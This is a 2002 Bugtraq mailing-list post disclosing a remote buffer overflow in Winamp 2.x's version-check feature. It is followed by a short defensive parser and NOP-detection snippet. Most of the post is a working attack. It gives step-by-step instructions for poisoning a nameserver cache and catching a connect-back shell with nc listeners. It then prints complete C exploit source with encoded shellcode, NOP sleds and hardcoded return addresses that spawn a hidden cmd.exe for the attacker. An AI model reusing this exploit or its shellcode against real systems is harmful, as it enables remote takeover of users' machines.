Bugtraq mailing list archives

remote winamp 2.x exploit (all current versions)


From: 2c79cbe14ac7d0b8472d3f129fa1df <c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com>
Date: Fri, 5 Jul 2002 08:13:43 -0700 (PDT)

2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory
Number Two

winamp has an option, enabled by default, which checks
on startup for the latest version from www.winamp.com
and will then notify the user of a possible upgrade
via messagebox..

unfortunately, if it were to receive a huge response,
the thread parsing the data is thrown into an infinite
loop and eventually the exception dispatcher is
called.. and then like most of the time under windows,
a big, bad, overflow occurs..

but how do we exploit this without hAXING
www.winamp.com..?

well.. that's up to you.. cache poisoning would be the
simplest.. or maybe some other, even more illicit,
means?

below is a simple attack:
---------------------------------------------------

nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2

1) attacker poisons nameserver cache

192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2


2) victim is now resolving www.winamp.com to attacker
machine

192.168.0.2:
C:\>nslookup www.winamp.com
Server:  z3.names.int
Address:  192.168.0.1

Name:    www.winamp.com
Address:  192.168.1.2


3) attacker fires up exploit as web daemon

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80


4) attacker waits for connect-back by exploit

192.168.1.2:

x@x:~$ nc -l -p 5555


5) foolish winamp user opens winamp!

192.168.0.2:

opens winamp, prepares for The Weather Girls - It's
Raining Men.mp3


6) BOOJAH!@

192.168.1.2:

x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

---------------------------------------------------

this is definitely exploitable on me/xp as well.. but
I don't have me or softice working in xp..

attached is the exploit for windows 2000 which will
spawn a connect-back cmd.exe to the user, and will be
completely transparent.. winamp will function as
normal even when cmd.exe terminates as we are just
exiting that current thread

I have also included a simple patch which just
hardcodes 205.188.245.120 in place of www.winamp.com..
no loss of functionality, so you will get a nice
messagebox when winamp 2.80b is released ;>

oh, and hushmail.. 3 weeks idle deactivation time my
ass.. I only wanted to be elite but now I have to
settle for hackers sniffing my yahoo..

yours truly, 2c79cbe14ac7d0b8472d3f129fa1df55


Attachment: wapatch.zip
Description: wapatch.zip

/*
        wampexp.c
        July 3rd, 2002
        
        Winamp 2.80a and all previous remote exploit (connect-back styles)

        winamp has an option, enabled by default, which checks for the latest
        version from www.winamp.com and will then notify the user of a possible
        upgrade via a messagebox..
        
        unfortunately, if it were to receive a huge response via some nameserver
        corruption the thread parsing the response is thrown into an infinite
        loop and eventually the exception dispatcher is called.. and THEN like
        most of the time under windows a big, bad, overflow occurs..
        
        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
            # nc -l -p 5555
            *poisoned user opens winamp*
            # nc -l -p 5555
            Microsoft Windows 2000 [Version 5.00.2195]
            (C) Copyright 1985-2000 Microsoft Corp.
            
            C:\>
        
        sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
        (c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com)
        
        yes, yahoo took away my 2! ;~~~
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

int main(int argc, char **argv){
        int i;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;    
        
        if (argc < 3){
                printf("Winamp 2.80a remote exploit (7/3/2002)\n");
                printf("c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com\n\n");
                printf("usage: %s <localhost> <localport>\n\n", argv[0]);
                printf("NOTE: target os is 2000.. probably works on all\n");
                printf("winamp versions prior to 2.80a as there are no \n");
                printf("dependencies on winamp, only the static ws2help\n\n");
                exit(-1);
        }

        // blatantly ripped! *TEEHEEEHHEH*
        a_port  = htons(atoi(argv[2]));
        a_port ^= 0x9595;
        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
        a_host  = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;
        shell[385] = ((a_port) & 0xff);
        shell[386] = ((a_port >> 8) & 0xff);        
        shell[390] = ((a_host) & 0xff);
        shell[391] = ((a_host >> 8) & 0xff);
        shell[392] = ((a_host >> 16) & 0xff);
        shell[393] = ((a_host >> 24) & 0xff);
        
        strcat(payload, shell);
        
        // lots of NOPs
        for(i=792;i<9704;i++)
                strcat(payload, "\x90");

        // we land here when we jmp ebx the second time
        // this sets ebx to the start of our shell, and jmps back
        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
        strcat(payload, "\x11\x01\xff\xe3");

        // lots more NOPs for lots more fun
        for(i=9718;i<35809;i++)
                strcat(payload, "\x90");
 
        // and bh, dl; jmp ebx.. this allows us to jmp back into an area
        // where we can put some real code
        strcat(payload, "\x22\xfa\xff\xe3");
        
        // our "eip" (call ecx; ntdll.dll@0x11936)
        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
        strcat(payload, "\xd6\x19\x02\x75");

        // if ws2help doesn't match for some reason, use this call ebx..
        // dependant on the winamp in_wm.dll plugin
        //strcat(payload, "\x57\x22\x12\x01");
 
        strcat(payload, "\x0d\x0a");

        printf("%s", payload);
        return 0;
}
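As an added, defender-side example that is not part of the original post and is not Winamp's code: a bounded parser for the reply shape the exploit's "minimal HTTP header and fake version" payload imitates ("OK\r\n\r\n<version>\r\n\r\n"), which refuses the oversized reply the post describes instead of looping on it, plus a NOP-run counter for update-check traffic captured at a proxy or IDS. The reply format, the 64-byte cap and the version-character set are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAX_REPLY   64   /* assumption: a genuine reply is a handful of bytes; refuse anything bigger */
#define MAX_VERSION 15   /* assumption: "2.80a"-style version strings are short */

enum verdict { V_OK = 0, V_TOO_LONG, V_BAD_FORMAT };

/* Parse a reply of the assumed shape "OK\r\n\r\n<version>\r\n\r\n" into out
 * (at least MAX_VERSION + 1 bytes). Every loop is bounded by n, so an
 * oversized or malformed reply can neither spin forever nor write past out. */
int parse_update_reply(const unsigned char *buf, size_t n, char *out)
{
    static const char head[] = "OK\r\n\r\n";
    static const char tail[] = "\r\n\r\n";
    size_t hl = sizeof head - 1, tl = sizeof tail - 1, i = 0;

    out[0] = '\0';
    if (n > MAX_REPLY)                                  /* the post's trigger: a huge reply */
        return V_TOO_LONG;
    if (n < hl + 1 + tl || memcmp(buf, head, hl) != 0)
        return V_BAD_FORMAT;
    while (hl + i < n - tl && i < MAX_VERSION) {        /* copy only version characters */
        unsigned char c = buf[hl + i];
        if (!isdigit(c) && !islower(c) && c != '.')
            break;
        out[i++] = (char)c;
    }
    out[i] = '\0';
    if (i == 0 || hl + i + tl != n || memcmp(buf + hl + i, tail, tl) != 0) {
        out[0] = '\0';                                  /* reject trailing or embedded garbage */
        return V_BAD_FORMAT;
    }
    return V_OK;
}

/* Longest run of 0x90 bytes in a captured reply. The exploit above pads its
 * payload with thousands of NOPs, so a long run inside update-check traffic
 * is a usable detection signal for a proxy or IDS rule. */
size_t longest_nop_run(const unsigned char *buf, size_t n)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < n; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > best)
            best = run;
    }
    return best;
}
```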
